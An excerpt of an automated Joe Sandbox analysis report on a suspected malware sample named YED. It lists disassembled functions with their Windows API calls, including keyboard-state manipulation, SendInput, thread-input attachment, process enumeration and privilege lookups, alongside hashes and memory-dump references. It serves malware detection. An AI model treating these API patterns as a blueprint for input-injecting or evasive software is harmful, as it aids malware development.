Opcode ID: 25efbbd5d3c35ddc7675acc22976b1cdf30247c526ab2500a1ec5401c882b639
Instruction ID: ad80f99cf28777a9448e7611c0e7ef0876b1ad216a4b96aca3d91033a03df6c4
Opcode Fuzzy Hash: 25efbbd5d3c35ddc7675acc22976b1cdf30247c526ab2500a1ec5401c882b639
Instruction Fuzzy Hash: 8E411972A20704BFD72A9F38CC45BAABBE9EF88710F10452AF555DB681D771D9318B80

Uniqueness

Uniqueness Score: -1.00%

Function 002856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00285783
GetLastError.KERNEL32(?,00000000), ref: 002857A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002857CE
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002857FA

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 02fe09cbacb66c406d34676f274cdd93a3be85af0e5d0ec0116631f1a6996528
Instruction ID: 60f0671ea9b34198dacc14200f5154b16735213f260a2f2387e98795b358aac7
Opcode Fuzzy Hash: 02fe09cbacb66c406d34676f274cdd93a3be85af0e5d0ec0116631f1a6996528
Instruction Fuzzy Hash: 45411A39610611DFCB11EF15C444A5EBBF2AF99320B198489EC4AAB362CB30FD91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0027AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0027ABF1
SetKeyboardState.USER32(00000080), ref: 0027AC0D
PostMessageW.USER32 ref: 0027AC74
SendInput.USER32(00000001,?,0000001C), ref: 0027ACC6

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 57506df14775ca2e9cc9e0e8bc6d9dfe0e238d5a672fc18c69d35664d78d8dda
Instruction ID: b6babdd93649e83caeda36b950e372f37cefd22e3a3f54f173075cee44fa2345
Opcode Fuzzy Hash: 57506df14775ca2e9cc9e0e8bc6d9dfe0e238d5a672fc18c69d35664d78d8dda
Instruction Fuzzy Hash: 0131F830A2071A7FEF26CF658809BFE7BA5ABC5330F14C21FE489521D1C77589A58752

Uniqueness

Uniqueness Score: -1.00%

Function 002A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 002A769A
GetWindowRect.USER32(?,?), ref: 002A7710
PtInRect.USER32(?,?,002A8B89), ref: 002A7720
MessageBeep.USER32 ref: 002A778C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 11f46c37c1dcbb5f33ef24b981fdf31ea1d135b7128a542a051315c5e2b72667
Instruction ID: 6866c70756fa8dce8e3c6f17c877fae46070e8f8015324a467ca03c61fa6d9d8
Opcode Fuzzy Hash: 11f46c37c1dcbb5f33ef24b981fdf31ea1d135b7128a542a051315c5e2b72667
Instruction Fuzzy Hash: 1741A938A19255DFCB01CF58DC98EA9B7F4FB4A304F1940A8E8149F261CB30A9A1CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002A16EB

Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65

GetCaretPos.USER32(?), ref: 002A16FF
ClientToScreen.USER32(00000000,?), ref: 002A174C
GetForegroundWindow.USER32 ref: 002A1752

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f165874ea595218e5dfd7026bc4e58ac26c116e037b5779c605eb4dedda78f45
Instruction ID: 28285bc3c313962d6fb64ba13e88fde92f73ed2b104d3fb7ef87effef2077fe9
Opcode Fuzzy Hash: f165874ea595218e5dfd7026bc4e58ac26c116e037b5779c605eb4dedda78f45
Instruction Fuzzy Hash: B0313E75D10249AFC704EFA9C8858EEB7F9EF59304B5080AAE415E7211EB319E55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0027D501
Process32FirstW.KERNEL32(00000000,?), ref: 0027D50F
Process32NextW.KERNEL32(00000000,?), ref: 0027D52F
CloseHandle.KERNEL32(00000000), ref: 0027D5DC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 84794726a7c770d7eabdc098b7ab7a6c4111a67b03534495c1fd9cb336c74079
Instruction ID: abb2b818f8819aaf9d5fab4aae4e601b745bdeb950678d6c0ebf3b36626b2c99
Opcode Fuzzy Hash: 84794726a7c770d7eabdc098b7ab7a6c4111a67b03534495c1fd9cb336c74079
Instruction Fuzzy Hash: 4431D171118301AFD300EF54D895AAFBBF8EFA9344F50492DF589831A1EF719998CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0027D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,002ACB68), ref: 0027D2FB
GetLastError.KERNEL32 ref: 0027D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0027D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002ACB68), ref: 0027D376

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 8d099880e283b327158b4dccfc09097ca7585f87dd563a95eee63a7e0c63e9f5
Instruction ID: ab55f4b4d60a8c440cd8977290dda313dd13baf543360b1e8b95bfde79b2cfbf
Opcode Fuzzy Hash: 8d099880e283b327158b4dccfc09097ca7585f87dd563a95eee63a7e0c63e9f5
Instruction Fuzzy Hash: 2A21A3705252029F8710DF24D8858AAB7F4EE56328F208A5DF89DC32A1DB31D956CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00271571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00271014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027102A
Part of subcall function 00271014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00271036
Part of subcall function 00271014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271045
Part of subcall function 00271014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027104C
Part of subcall function 00271014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002715BE
_memcmp.LIBVCRUNTIME ref: 002715E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00271617
HeapFree.KERNEL32(00000000), ref: 0027161E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 10854d19091dc087fb44e1e45f25313810e0ee53cb84a4b982c9c550b0d48e82
Instruction ID: 3f92785b570273f4b27568375161e2c308b2f26cf2800de2ba0b626c4ff76133
Opcode Fuzzy Hash: 10854d19091dc087fb44e1e45f25313810e0ee53cb84a4b982c9c550b0d48e82
Instruction Fuzzy Hash: 6221AF71E10109EFDF14DFA8C949BEEB7B8EF44344F188459E449AB241E730AA25DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

GetCursorPos.USER32(?), ref: 002A9001
TrackPopupMenuEx.USER32 ref: 002A9016
GetCursorPos.USER32(?), ref: 002A905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00267711,?,?,?), ref: 002A9094

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d3ee9716c55e80ef1542155f98474c259592b67585ca08226c73e6068389c208
Instruction ID: 699a54e66c585fdf77d4781c8ca0e644b2f1055f06cd0fb73da3d85cbeda2103
Opcode Fuzzy Hash: d3ee9716c55e80ef1542155f98474c259592b67585ca08226c73e6068389c208
Instruction Fuzzy Hash: 1321A135610018FFDB258F95DC98EFA7BB9EF8A390F144065F9055B261CB3199A0DF60

Uniqueness

Uniqueness Score: -1.00%

Function 002A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 002A280A
SetWindowLongW.USER32 ref: 002A2824
SetWindowLongW.USER32 ref: 002A2832
SetLayeredWindowAttributes.USER32 ref: 002A2840

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 3323c84c6aca9742a27560757909fe299e61acad48a72bec4b72d256ba865e4f
Instruction ID: fec04a5019117d11558f0cdf24d295a07e1eb3be686916828c37eeab27d2efe4
Opcode Fuzzy Hash: 3323c84c6aca9742a27560757909fe299e61acad48a72bec4b72d256ba865e4f
Instruction Fuzzy Hash: 3721E231214111EFD7149B28CC44FAAB795AF46324F248158F4268B6E2CF75ED96CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002A56BB
_wcslen.LIBCMT ref: 002A56CD
_wcslen.LIBCMT ref: 002A56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 002A5816

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 4fc499f5c34cdd3ec0c4a00078afdedee0ede52330867a895c557a5f3fb57df7
Instruction ID: 531c0d1e0e47fd6fc8ccfa1f019729eaa83fb984630af5a122be8ec346b4d9cb
Opcode Fuzzy Hash: 4fc499f5c34cdd3ec0c4a00078afdedee0ede52330867a895c557a5f3fb57df7
Instruction Fuzzy Hash: 0611B17163062AD7DB20DF619C85AEF77ACBF16760F104066F915D6081EFB09AA4CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 029F2782 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029F279E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029F27B7

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
Instruction ID: ced12e47c3e75b6ff257e23d29169d4c6a1c68713413ef53e05e707fe5ee2233
Opcode Fuzzy Hash: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
Instruction Fuzzy Hash: 80014233E493119EAAF127B5BCC4B672B99EB45778720023AFF24481F0EF1198028798

Uniqueness

Uniqueness Score: -1.00%

Function 0023D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0023CFF9,00000000,00000004,00000000), ref: 0023D218
GetLastError.KERNEL32 ref: 0023D224
__dosmaperr.LIBCMT ref: 0023D22B
ResumeThread.KERNEL32(00000000), ref: 0023D249

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: b7c530cc40451db1f43f1f93f3775c0470dbaf6145bcb84fcc57621928bec3e2
Instruction ID: 3545bb1817adb169f51037035a71b588a9f808ab59f7d56f4e9a13f5b342441c
Opcode Fuzzy Hash: b7c530cc40451db1f43f1f93f3775c0470dbaf6145bcb84fcc57621928bec3e2
Instruction Fuzzy Hash: D90126B2824204BBCB105FA5FC09BAB7A68DF82730F200219FC24921D1CF70C820CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0027E1FD
MessageBoxW.USER32 ref: 0027E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0027E246
CloseHandle.KERNEL32(00000000), ref: 0027E24D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 190a7c2de8ee4b471ed528ed91b257ce6b2e4509ffcd48b4a39d16d75b2b87c9
Instruction ID: 17ea7e7469346c9a6d9fd8e8dc428a28e9c2290c9285dcd4027262857f03e136
Opcode Fuzzy Hash: 190a7c2de8ee4b471ed528ed91b257ce6b2e4509ffcd48b4a39d16d75b2b87c9
Instruction Fuzzy Hash: 45112B72A14254BBCB019FA8BC4DA9F7FAC9B46320F1182A5FC18D7295DAB0CD1087B0

Uniqueness

Uniqueness Score: -1.00%

Function 0021600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0021604C
GetStockObject.GDI32(00000011), ref: 00216060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 685e88f92739e1f1e4121a96f3a2f6d3686b71bfead3d8b2893aa9bfd471d7c0
Instruction ID: 224e3ad8ad06bd4ab245b75aa59b63805986bee9a33935a3550100d7540d02ca
Opcode Fuzzy Hash: 685e88f92739e1f1e4121a96f3a2f6d3686b71bfead3d8b2893aa9bfd471d7c0
Instruction Fuzzy Hash: 7D116D72511549BFEF129FA49C48EEEBBADFF1D3A4F140215FA1452110DB329CA0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00277464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0027747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00277497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002774AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002774CA

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: e8e90c4f5622c1630e3c542c944f39924092706d12044a3dbdff9a4f064bdb12
Instruction ID: 750df4380a3ec1b5bedb82018cf75ec99638d1a66c35d3aac6d4fc4fe04efd4f
Opcode Fuzzy Hash: e8e90c4f5622c1630e3c542c944f39924092706d12044a3dbdff9a4f064bdb12
Instruction Fuzzy Hash: D911A1B52153119BF7208F24EC18F927FFCEB04B00F10C569A61AD6151DBB0E914DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0027B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B126

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: e6dd250862cbe06e7d074bd696c359946453dcdd4389e0d8429597e58fe12581
Instruction ID: 7757e93b4e5a3666749fac113ea7d748e62efd9399d0f2d88764ba23992776c4
Opcode Fuzzy Hash: e6dd250862cbe06e7d074bd696c359946453dcdd4389e0d8429597e58fe12581
Instruction Fuzzy Hash: A5118B30E2152DE7CF01AFE4E9687EEBB78FF0A311F108096D949B2181CB308661CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00272DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00272DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00272DD6
GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00272DDD
AttachThreadInput.USER32(00000000,?,00000000), ref: 00272DE4

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
